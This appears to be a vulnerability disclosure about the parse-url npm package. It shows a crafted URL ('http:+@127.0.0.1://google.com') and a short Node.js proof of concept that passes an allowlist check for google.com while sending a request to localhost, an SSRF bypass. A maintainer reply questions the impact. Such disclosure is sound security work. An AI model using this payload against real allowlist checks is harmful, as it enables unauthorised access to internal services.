Malicious usage of '+' in protocol can lead to whitelist bypasses in ionicabizau/parse-url
Reported on
Mar 13th 2022
Description
Malicious usage of '+' in protocol can lead to whitelist bypasses.
Proof of Concept
The following PoC shows how if parse-url is used to check the resource of a URL against a whitelist, we can bypass a whitelist check for google.com, and then convince the standard HTTP client in NodeJS to make a request to 127.0.0.1.
const parse = require('parse-url')
const http = require('http')
const url = parse("http:+@127.0.0.1://google.com")
if (url.resource === "google.com") {
http.get(url.href)
}
This is due to parse-url will only locate the resource section only after :// whilst other URL parsers such as the WHATWG URL parser will stop the resource section at :
{
protocols: [ 'http:', '@127.0.0.1' ],
protocol: 'http:',
port: null,
resource: 'google.com',
user: '',
pathname: '',
hash: '',
search: '',
href: 'http:+@127.0.0.1://google.com',
query: [Object: null prototype] {}
}
Impact
This vulnerability is capable of blacklist / whitelist SSRF bypasses
Occurrences
Hi Haxatron! The impact of this parsing issue is unclear and I'm not sure if this would constitute a vulnerability. For the proposed impact to be true, the parser would need to indicate that data should be loaded from one resource, whilst providing a different resource to a potential whitelist. How can this be?
Adjusting the severity until this is clear.